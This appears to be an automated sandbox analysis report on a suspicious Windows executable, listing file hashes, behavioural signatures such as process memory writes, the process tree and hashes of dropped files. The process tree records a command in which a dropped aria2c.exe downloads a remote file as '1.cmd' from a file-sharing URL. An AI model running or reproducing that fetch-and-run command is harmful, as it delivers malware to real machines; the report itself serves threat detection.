Analysis
- max time kernel: 119s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20231215-en
- resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
- submitted: 03/02/2024, 15:33
Static task
- static1
Behavioral tasks
- behavioral1: sample e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe, resource win7-20231215-en
- behavioral2: sample e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe, resource win10v2004-20231222-en
- behavioral3: sample $0/aria2c.exe, resource win7-20231215-en
- behavioral4: sample $0/aria2c.exe, resource win10v2004-20231222-en
General
- Target: e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
- Size: 1.9MB
- MD5: 61e62e70e51eeba5c6041960dcbb47a5
- SHA1: 94213db89c31c5314378b2ec6e1859cd83610530
- SHA256: e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f
- SHA512: e0c1270ef1252a8d029c383b5de46eef09369ace186eb7f6a43fb925d5dbc492faa9ee116b3f18ecc1cc73d345201b80746d9c501765edc8d5b44a9c3c2e1a0f
- SSDEEP: 49152:peqiGLHnKt1f2LSSlaugdgqeZzD0z2dJDK3Shz4JHbjQHv3RHAygA0:peNGOci2qDCdJWDi+W0
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  pid   Process
  2628  aria2c.exe
- Loads dropped DLL (3 IoCs)
  pid   Process
  2460  e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
  2460  e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
  2680  Process not Found
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (4 IoCs)
  description                        pid   Process                                                                   procid_target
  PID 2460 wrote to memory of 2628   2460  e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe  28
  PID 2460 wrote to memory of 2628   2460  e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe  28
  PID 2460 wrote to memory of 2628   2460  e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe  28
  PID 2460 wrote to memory of 2628   2460  e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe  28
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  PID: 2460
  - [2] C:\Users\Administrator\lgx\aria2c.exe
    Command line: "C:\Users\Administrator\lgx\aria2c.exe" --quiet --allow-overwrite=true -d "C:\Users\Administrator\lgx" -o 1.cmd "https://vip.123pan.cn/1814328088/gtx/551.23/ykd"
    Signatures: Executes dropped EXE
    PID: 2628
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3.1MB
  MD5: 20c51badeab67a2e6ccefe85f8d83ab0
  SHA1: ea109f1d681c9de61eae24046c1f535a630c8534
  SHA256: 736d6cdbe08e7bacebf30eb027b0cb87602b949d1edfb002217b82204c4a5161
  SHA512: c81dccee0f841519eabbbd7de44bcd232432e13f95dd769e232c9958ace00fbf3a8fb84a55203279786b04acc85c54a2822e3c11d6b1c172bdea497ead6b7d8b
- Filesize: 462KB
  MD5: 049519830e17964974989a25ea441a7a
  SHA1: 95239a050ff5a17d4437754d821f44533edaecf8
  SHA256: 8ec25570234a3a976138e403acad0c95a6f4ce65501aefdc9839d4fc7a6480e4
  SHA512: 44a26abb4709ba46882d3acd363929b63d632346c870256c44cc7ba796aa0e97fbeb5711f832cb3213f548b11f6eb3ed388a4a2b737bd32542b00001f159a5d9
- Filesize: 2.7MB
  MD5: abf058896acbba8df409057796bbab92
  SHA1: a96b7bcde090edccb419fea73426451098a129e0
  SHA256: aab24978671375380140f72ba7a5231e58bb2932dac4c4c9bf0819e55fb59667
  SHA512: 1fe9d903cd854a64961d7345236e611725cd1b3c9ea0506ec67f84313d34729532d8c1283c41b9c3c717e6ae4fd550cab627051459507416799019d6c0752f10
- Filesize: 2.5MB
  MD5: 44080066742147dda6133690bb851c20
  SHA1: 226ce45578992b371870b0a093ddb08113ab873b
  SHA256: a4ea1156c2dd943e3f193698de069f45a0aa6e84756284a9ab35d682f05e2612
  SHA512: 5b0811347afe4d111a0163b92bdbb2519b79b7e0aec71f20a00fb26adfa1cefc06c6024994d1d9242fdaf68586384d9f29005e020f50c778dd328dcc305fc873